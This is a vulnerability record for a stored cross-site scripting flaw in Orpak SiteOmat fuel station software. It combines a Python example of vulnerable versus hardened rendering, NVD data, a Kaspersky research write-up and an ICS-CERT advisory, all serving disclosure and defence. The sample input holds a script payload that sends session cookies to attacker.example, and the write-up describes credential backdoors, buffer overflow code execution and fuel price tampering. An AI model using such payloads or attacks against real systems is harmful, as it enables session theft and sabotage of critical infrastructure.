ID CVE-2017-14850 Type cve Reporter cve@mitre.org Modified 2019-06-04T19:47:00
Description
All known versions of the Orpak SiteOmat web management console are vulnerable to multiple instances of stored cross-site scripting due to improper validation of external user input. An attacker with access to the web interface is able to hijack sessions or redirect victims out of SiteOmat to a malicious server under the attacker's control.
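The flaw described above is CWE-79: operator-supplied text is stored by the console and later written into a page for other users without output encoding, so a script or a crafted link planted by one user runs in, or redirects, every other user's browser. The Python below is an added illustration and is not SiteOmat code; the "site name" and "logo URL" fields, the template fragment, the allowed host name and the cookie and CSP header values are all assumptions chosen to model a management console of this kind. It puts the vulnerable concatenation next to a hardened rendering (HTML-body escaping for text, an allow-list plus attribute escaping for URLs) and shows the two response headers that limit what a stored payload can still do: an HttpOnly, Secure cookie against the session hijacking the description mentions, and a Content-Security-Policy against inline script.

```python
"""Stored XSS (CWE-79): the vulnerable rendering pattern beside its hardened form.

Added example for CVE-2017-14850; not code from Orpak SiteOmat.  Field names,
template, allowed host and header values are assumptions.
"""
from html import escape
from urllib.parse import urlparse

# Constructed sample input: what a user with console access might save into
# free-text / URL fields.  Both are textbook XSS shapes, not SiteOmat payloads.
STORED_SITE_NAME = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
STORED_LOGO_URL = "javascript:alert(1)"


def render_vulnerable(site_name: str, logo_url: str) -> str:
    """Stored values concatenated straight into HTML: this is the CWE-79 pattern."""
    return ('<h1>Station: ' + site_name + '</h1>'
            '<a href="' + logo_url + '">site</a>')


def safe_url(url: str, allowed_hosts=("siteomat.local",)) -> str:
    """Allow only http(s) URLs to known hosts; everything else collapses to '#'.

    This blocks javascript: URLs and links that would navigate a victim to an
    attacker-controlled server.  'siteomat.local' is an assumed host name."""
    parsed = urlparse(url)
    if parsed.scheme in ("http", "https") and parsed.hostname in allowed_hosts:
        return escape(url, quote=True)  # attribute context: also encode quotes
    return "#"


def render_hardened(site_name: str, logo_url: str) -> str:
    """Context-aware output encoding: escape text for the HTML body, allow-list
    and escape the URL for the href attribute."""
    return ('<h1>Station: ' + escape(site_name, quote=True) + '</h1>'
            '<a href="' + safe_url(logo_url) + '">site</a>')


def contains_active_content(html: str) -> bool:
    """Crude post-render check: does the markup still carry a script element
    or a javascript: link?  Used to demonstrate the two renderers differ."""
    low = html.lower()
    return "<script" in low or 'href="javascript:' in low


def session_cookie_header(session_id: str) -> str:
    """Cookie attributes that blunt session theft through XSS: HttpOnly keeps
    the value out of document.cookie, Secure keeps it off plaintext HTTP,
    SameSite=Strict stops cross-site requests from carrying it."""
    return f"Set-Cookie: SID={session_id}; HttpOnly; Secure; SameSite=Strict; Path=/"


def csp_header() -> str:
    """A restrictive CSP: inline scripts and off-origin script sources are
    refused by the browser even if an escaping bug slips through."""
    return ("Content-Security-Policy: default-src 'self'; script-src 'self'; "
            "object-src 'none'; base-uri 'none'")


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(STORED_SITE_NAME, STORED_LOGO_URL))
    print("hardened:  ", render_hardened(STORED_SITE_NAME, STORED_LOGO_URL))
    print(session_cookie_header("example-session-id"))
    print(csp_header())
```

The escaping has to match the output context: `html.escape` is right for the element body and, with `quote=True`, for a quoted attribute, but a URL attribute additionally needs the scheme and host checked, because an escaped `javascript:` URL is still a `javascript:` URL. The headers are defence in depth, not a substitute for the encoding.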
{"id": "CVE-2017-14850", "bulletinFamily": "NVD", "title": "CVE-2017-14850", "description": "All known versions of the Orpak SiteOmat web management console is vulnerable to multiple instances of Stored Cross-site Scripting due to improper external user-input validation. An attacker with access to the web interface is able to hijack sessions or navigate victims outside of SiteOmat, to a malicious server owned by him.", "published": "2019-06-03T19:29:00", "modified": "2019-06-04T19:47:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14850", "reporter": "cve@mitre.org", "references": ["https://ics-cert.us-cert.gov/advisories/ICSA-19-122-01", "http://www.securityfocus.com/bid/108167", "https://www.orpak.com"], "cvelist": ["CVE-2017-14850"], "type": "cve", "lastseen": "2020-12-09T20:13:24", "edition": 6, "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:B6F614DF1363BE33528186803A2C177D"]}, {"type": "ics", "idList": ["ICSA-19-122-01"]}], "modified": "2020-12-09T20:13:24", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2020-12-09T20:13:24", "rev": 2}, "vulnersScore": 4.5}, "cpe": [], "affectedSoftware": [{"cpeName": "orpak:siteomat", "name": "orpak siteomat", "operator": "lt", "version": "6.4.414.084"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 
6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:orpak:siteomat:6.4.414.084:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.414.084", "vulnerable": true}], "operator": "OR"}]}}
{"securelist": [{"lastseen": "2018-02-22T14:50:37", "bulletinFamily": "blog", "cvelist": ["CVE-2017-14728", "CVE-2017-14850", "CVE-2017-14851", "CVE-2017-14852", "CVE-2017-14853", "CVE-2017-14854"], "description": "\n\nA few months ago, while undertaking unrelated research into online connected devices, we uncovered something surprising and realized almost immediately that we could be looking at a critical security threat. What we found was a simple purple web interface that was in fact a link to a real-life gas station, and we suspected this link made the station remotely hackable.\n\nAmihai Neiderman, then working for Azimuth security, and I investigated the findings. When our suspicions turned out to be true, we reported them to the vendor.\n\nThe story was covered recently by [Motherboard VICE](<https://motherboard.vice.com/en_us/article/43qkgb/flaws-in-gas-station-software-let-hackers-change-prices-steal-fuel-erase-evidence>), and here we will share some of the technical details behind it. Further details of this research will be shared in early March at the [Security Analyst Summit 2018](<https://sas.kaspersky.com/>) in Cancun.\n\nThe device we investigated was not just a tiny web interface. It was an embedded box running a Linux-based controller unit that was installed with a tiny httpd server.\n\nAccording to its manufacturer, the controller's software is a site automation device that is responsible for managing every component of the station, including dispensers, payment terminals and more.\n\nMore specifically, the controller is at the heart of the station and if an intruder finds a way to take over the box, the results could be catastrophic. 
Another worrying detail, discovered later in the research, was when the solution was installed \u2013 many instances were embedded in fueling systems _over a decade ago_ and have been connected to the internet ever since.\n\nBefore the research, we honestly believed that all fueling systems, without exception, would be isolated from the internet and properly monitored. But we were wrong. With our experienced eyes, we came to realize that even the least skilled attacker could use this product to take over a fueling system from anywhere in the world.\n\n## Hide & seek\n\nThe fuel stations we found using this product carried a watermark that can be found by running a search query with just one keyword. Within a few seconds, all those that are connected reveal their exact location and listening services.\n\nThe following chart uses data from an online search engine and other sources to show the geographical spread of the fuel stations. We found that more than 1,000 gas stations are accessible from any computer in the world. And when it comes to [IoT](<https://securelist.com/threats/internet-of-things-glossary?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) hacking, gas stations are a far more dangerous target than webcams, for example.\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-2.png>)_Top countries with gas stations open to the internet (data from Shodan and telemetry sources)_\n\nMost of the research involved reviewing the information available online. It seems that the manufacturer posted much of the device's technical information, allowing clients to go online and grab it. The user manuals were very detailed. They included screenshots, default credentials, different commands and a step-by-step guide on how to access and manage each of the interfaces. 
That alone assisted us in gaining all the information we needed, before we even wrote a single line of code.\n\nWe understood how obsolete the device was when we realized it was operative and accessible remotely using services you don't expect to see in modern devices. The user manual carefully listed the services it was using and the network architecture. Understanding how the device operates in the network doesn't require special hacking skills.\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-3-5.jpg>)_Network layout showing the main controller unit and its access privileges_\n\n## Default credentials\n\nWe found many places where default credentials were mentioned. Using the online search engine, we even saw proof that the services listed in the manual were scraped by the engine at some point in time. Since the engine itself is fairly new, it is believed that the services are also accessible. Among the rest, SSH, HTTP and X11 were marked as potential access backdoors.\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-4.png>)_Shift management login page with security issues allowing complete bypass_\n\nDuring the research, we were able to log in to one shift management console. But that was just one instance \u2013 how could we be sure that all the other stations were accessible as well? We needed to ask permission from a gas station owner to let us access the station when it was offline.\n\nWe wanted to understand what exactly was behind that web interface. Did it have the same functionality as a web camera, or could we actually find a critical issue that could cause major damage?\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-5-e1514452916698.png>)\n\nThe shift management console\n\nThe console appeared very robust. 
Considering the level of technical knowledge a shift manager is required to have, the functionality would allow them to pretty much change the dispenser settings, including gas station prices, printer settings, shift reports and more. The risk here stems from a malicious insider \u2013 a shift manager can modify shift reports, printed receipts and the actual gas price. We believe that such privileges should be reserved for the gas station owner only. In addition, we suspect that there are more interfaces in the network which allow a shift employee to track the convenience store and payment terminal using high privileges as well. In the sketch above, there was no mention of any protection software in place.\n\n[](<https://securelist.com/files/2018/02/expensive_gas-6_n.png>)\n\n_Functionality to change gas prices available to gas station shift manager_\n\nThe next step in the research was to verify if we could access the station remotely without any credentials. We started looking for creative ways to bypass the authentication mechanism. Presuming it was obsolete and not properly tested before being deployed, we didn't expect it to take more than a day or two.\n\n## A snake in the haystack\n\nWe were positive that a coding vulnerability would be the first thing to surface, but it was something we least expected to find that first caught our attention.\n\nOnce the initial firmware dump and main binary reversing step was completed, we searched for the login mechanism within the decompiled code. To our surprise, the following 'if' condition was a core part of that mechanism. It was a hardcoded username and password. 
In other words, a manufacturer backdoor for cases when the device requires remote or local access with the highest privileges.\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-7.png>)_Hardcoded credentials, a zero-day vulnerability reserved with _[_CVE-2017-14728_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14728>)\n\nEvery similar device belonging to that vendor, up to the version we found, contained these hardcoded credentials. We reported our findings to MITRE to reserve the CVE, and contacted the vendor.\n\nIn addition to hardcoded passwords, we found many areas that we suspect contain insecure code and which might allow code to be executed remotely. A code review of one of these components, soWebServer::XMLGetMeansReportRowsNumber, boiled down to a name parameter which is controlled by the end user and is prone to a stack-based buffer overflow attack. Based on that finding, we compiled a fully working remote code execution exploit. Part of that code is in the following screenshot.\n\n[](<https://securelist.com/files/2018/02/171228_expensive_gas-66.png>)_Code for remote login and stack buffer overflow_\n\nAnother code area which captured our attention was an authentication component which contained SQL injection. Throughout the entire analysis, we did not find the SQL injection protections to be sufficient. This is one example:\n\n[](<https://securelist.com/files/2018/02/171228_expensive_gas-67.png>)_Code to extract gas station's name and location_\n\n## Geo exploitation\n\nIt is perfectly plausible that an IP address shows the actual location of a gas station, but we wanted to dig even further into the code and understand whether a gas station owner actually inputs the name of the gas station, or any location ID that can be traced, to find the actual location, gas vendor and other information related to that location.\n\nWe found an XML component which is responsible for generating reports on a daily basis. 
It was found to contain a parameter that holds the actual name and location of the station. We wrote a quick proof of concept to simply extract this parameter's value.\n\n[](<https://securelist.com/files/2018/02/expensive_gas-11.png>)\n\n_Code to extract gas station's name and location_\n\nAs said, the code was not tested globally, but in the one case we had, it did extract the name, which after a few searches retrieved the exact location, vendor name and contact details.\n\n## Update price\n\nGiven the possibility of utilizing the hardcoded credentials to access the SiteOmat web interface and tamper with the **update_price.cgi** component's input parameters, an intruder would be able to change the fuel price. To reproduce such an attempt, the first thing that needs to be done is to extract the victim dispenser's information in JSON format, to better understand which products are being sold and for what price. This can be achieved using one of the XML files responsible for storing the real-time prices in the local database.\n\n[](<https://securelist.com/files/2018/02/171228_expensive_gas-68.png>)_Code snippet taken from the price modification proof of concept_\n\nEach product has an ID, a gas type, a name following the type, and a price. An intruder only needs to modify the gas type in order to update the price.\n\nOnce the intruder decides which of the prices to change, they will have to query the relevant CGI component that changes the price.\n\n## The payment terminal\n\nAn intruder that gains access to the gas station is able to connect directly to the payment terminal, and either extract payment information or directly exploit the payment bridge to steal transactions. 
We did not cover that area in our research since we lacked access to the gas station network, though we strongly believe that it requires inspection and testing.\n\n## What an intruder can do\n\nTo give you some idea of the capabilities an intruder gains when taking over a gas station system through the vulnerable device we uncovered, here are a few scenarios:\n\n * Shut down all fueling systems\n * Cause fuel leakage and risk of casualties\n * Change fueling price\n * Circumvent payment terminal to steal money\n * Scrape vehicle license plates and driver identities\n * Halt the station's operation, demanding a ransom in exchange\n * Execute code on the controller unit\n * Move freely within the gas station network\n\nTo the best of our knowledge, the vulnerable gas stations have not yet been asked to disable remote access through this controller. In September 2017, we alerted the vendor to the issues and offered to send full technical details to help ensure the vulnerabilities could be fixed.\n\nThe [Motherboard Vice](<https://motherboard.vice.com/en_us/article/43qkgb/flaws-in-gas-station-software-let-hackers-change-prices-steal-fuel-erase-evidence>) article referenced a recent incident in Moscow where a hacker helped to fraudulently siphon gas from customers using malicious code \u2013 but we do not believe this incident is related to the area of our research. Our online search did not find any gas stations in Russia with this controller installed, and a recent presentation in Moscow of our ongoing research did not make public the name of the product, its manufacturer or technical details of the vulnerabilities.\n\nMITRE received reports on the vulnerabilities found during the research, though triage is still in process. 
CERT IL & US were also updated with details about the vulnerabilities.\n\n## Reported vulnerabilities - MITRE\n\n**Reserved CVEs** | **Description** \n---|--- \nCVE-2017-14728 | Hardcoded Administrator Credentials \nCVE-2017-14850 | Persistent XSS \nCVE-2017-14851 | SQL Injection \nCVE-2017-14852 | Insecure Communication \nCVE-2017-14853 | Code injection \nCVE-2017-14854 | Buffer Overflow allows RCE", "modified": "2018-02-07T10:00:22", "published": "2018-02-07T10:00:22", "href": "https://securelist.com/expensive-gas/83542/", "id": "SECURELIST:B6F614DF1363BE33528186803A2C177D", "type": "securelist", "title": "Gas is too expensive? Let\u2019s make it cheap!", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2020-12-18T03:21:38", "bulletinFamily": "info", "cvelist": ["CVE-2017-14850", "CVE-2017-14853", "CVE-2017-14854", "CVE-2017-14851", "CVE-2017-14852", "CVE-2017-14728"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION: **Exploitable remotely/low skill level to exploit/public exploits available\n * **Vendor:** Orpak (acquired by Gilbarco Veeder-Root)\n * **Equipment: **SiteOmat\n * **Vulnerabilities: **Use of Hard-coded Credentials, Cross-site Scripting, SQL Injection, Missing Encryption of Sensitive Data, Code Injection, Stack-based Buffer Overflow\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in arbitrary remote code execution resulting in possible denial-of-service conditions and unauthorized access to view and edit monitoring, configuration, and payment information.\n\n## 3\\. 
TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of SiteOmat, software for fuel station management, are affected:\n\n * SiteOmat versions prior to 6.4.414.122 only are vulnerable to stack-based buffer overflow CVE-2017-14854 and Code Injection CVE-2017-14853\n * SiteOmat Versions prior to 6.4.414.084\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [USE OF HARD-CODED CREDENTIALS CWE-798](<https://cwe.mitre.org/data/definitions/798>)\n\nThe application utilizes hard coded username and password credentials for application login.\n\n[CVE-2017-14728](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14728>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe application web interface does not properly neutralize user-controllable input, which could allow cross-site scripting.\n\n[CVE-2017-14850](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14850>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 3.2.3 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') CWE-89](<https://cwe.mitre.org/data/definitions/89.html>)\n\nThe application does not properly sanitize external input, which may allow an attacker to access the product by specially crafted input.\n\n[CVE-2017-14851](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14851>) has been assigned to this vulnerability. 
A CVSS v3 base score of 9.4 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L>)).\n\n#### 3.2.4 [MISSING ENCRYPTION OF SENSITIVE DATA CWE-311](<https://cwe.mitre.org/data/definitions/311.html>)\n\nThe application transmits information in plain text, including credentials, which could allow an attacker with access to transmitted data to obtain credentials and bypass authentication.\n\n[CVE-2017-14852](<https://nvd.nist.gov/vuln/detail/CVE-2017-14852>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L>)).\n\n#### 3.2.5 [IMPROPER CONTROL OF GENERATION OF CODE ('CODE INJECTION') CWE-94](<https://cwe.mitre.org/data/definitions/94.html>)\n\nThe application does not properly restrict syntax from external input, which could allow unauthenticated users to execute specially crafted code on the target system.\n\n[CVE-2017-14853](<https://nvd.nist.gov/vuln/detail/CVE-2017-14853>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L>)).\n\n#### 3.2.6 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)\n\nThe application utilizes a function that accepts user input. This input is not properly validated, which could allow an attacker to execute arbitrary code.\n\n[CVE-2017-14854](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14854>) has been assigned to this vulnerability. 
A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H>).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Energy, Transportation Systems\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Israel\n\n### 3.4 RESEARCHER\n\nIdo Naor and Amihai Naiderman of Kaspersky Lab reported these vulnerabilities to NCCIC.\n\n## 4\\. MITIGATIONS\n\nOrpak recommends users of affected versions update to the latest release v6.4.414.139 or later. The update can be obtained by contacting customer care with the following options:\n\nOnline Ticket (login required): <https://support.zoho.com/portal/orpak/home>\n\nEmail: [support@orpak.com](<mailto:support@orpak.com>)\n\nTel: +972 3 577 6864\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n * Restrict system access to authorized personnel only and follow a least privilege approach.\n * Apply defense-in-depth strategies.\n * Disable unnecessary accounts and services.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. 
Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-19-122-01>); we'd welcome your feedback.\n", "edition": 12, "modified": "2019-05-06T00:00:00", "published": "2019-05-02T00:00:00", "id": "ICSA-19-122-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-19-122-01", "title": "Orpak SiteOmat", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}